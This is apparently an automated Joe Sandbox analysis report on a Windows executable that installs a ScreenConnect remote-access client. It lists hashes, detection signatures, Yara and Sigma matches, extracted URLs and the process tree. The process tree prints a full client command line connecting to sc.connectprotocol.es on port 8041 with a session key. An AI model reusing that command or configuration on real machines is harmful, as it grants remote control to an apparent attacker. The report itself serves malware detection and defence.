Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f53WqfzzNt.exe

Overview

General Information

Sample name:f53WqfzzNt.exe
renamed because original name is a hash value
Original sample name:5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57.exe
Analysis ID:1567469
MD5:a27847506c27a6bde1a5f7d092bf29d2
SHA1:5857ffbb63987615da9ea0ffc0e5564e257d7729
SHA256:5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57
Tags:ConnectWiseexescreen-connectprotocol-essigneduser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:46
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • f53WqfzzNt.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\f53WqfzzNt.exe" MD5: A27847506C27A6BDE1A5F7D092BF29D2)
    • msiexec.exe (PID: 7552 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7588 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7636 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 247D8C2517E6E69F0B3D03A8794ECC06 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7680 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7764 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E58C0E678653AE880B7CA7B7ACABB13E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6B1ED9B9CEA69D2B0631C700B5D80215 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7856 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=GOLDEN-TEAM-001" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7924 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "e3ab8850-6564-49da-aa7c-f9fea2857c14" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 8116 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "91491e11-89f3-4d65-94f1-b87642885275" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 8060 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
f53WqfzzNt.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Temp\~DFCC421647BED1434B.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DFCD8E0A85204A1AE0.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DFE92FC617A28FB7B7.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DF8EE2806658991912.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Windows\Temp\~DF61A468A6AB3D1920.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.1747609157.0000000005A90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 4 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.2.f53WqfzzNt.exe.5a90000.9.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          8.0.ScreenConnect.WindowsClient.exe.e60000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            8.2.ScreenConnect.WindowsClient.exe.316fa10.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              0.2.f53WqfzzNt.exe.5a90000.9.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                10.2.ScreenConnect.WindowsClient.exe.23bfa50.3.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                  Click to see the 4 entries

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Windows Processes Suspicious Parent Directory
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8060, ProcessName: svchost.exe

                                  Suricata Signatures

                                  No Suricata rule has matched

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Multi AV Scanner detection for submitted file
                                  Source: f53WqfzzNt.exeReversingLabs: Detection: 26%
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.0% probability
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_03991738 CryptProtectData,7_2_03991738
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_03991730 CryptProtectData,7_2_03991730
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_05211504 CryptUnprotectData,7_2_05211504
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_05212FA0 CryptUnprotectData,7_2_05212FA0
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeEXE: msiexec.exeJump to behavior

                                  Compliance

                                  barindex
                                  EXE planting / hijacking vulnerabilities found
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeEXE: msiexec.exeJump to behavior
                                  Uses 32bit PE files
                                  Source: f53WqfzzNt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  PE / OLE file has a valid certificate
                                  Source: f53WqfzzNt.exeStatic PE information: certificate valid
                                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                                  Source: f53WqfzzNt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Binary contains paths to debug symbols
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: f53WqfzzNt.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: f53WqfzzNt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829810694.0000000002312000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829695484.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: f53WqfzzNt.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1769116462.0000000000C0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1742512877.0000000004430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSICBE0.tmp.2.dr, MSICFCA.tmp.2.dr, 4ec95f.msi.2.dr, MSICBF0.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, 4ec960.rbs.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSIC2F6.tmp.1.dr, 4ec95f.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: f53WqfzzNt.exe
                                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile opened: c:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                                  Networking

                                  barindex
                                  Enables network access during safeboot for specific services
                                  Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 38.69.12.167:8041
                                  Source: Joe Sandbox ViewIP Address: 38.69.12.167 38.69.12.167
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: sc.connectprotocol.es
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: svchost.exe, 00000009.00000002.3446163571.000001859C093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BE68000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: edb.log.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                  Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BE68000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BE68000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BE9D000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                  Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1727538810.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3577508560.0000000001719000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
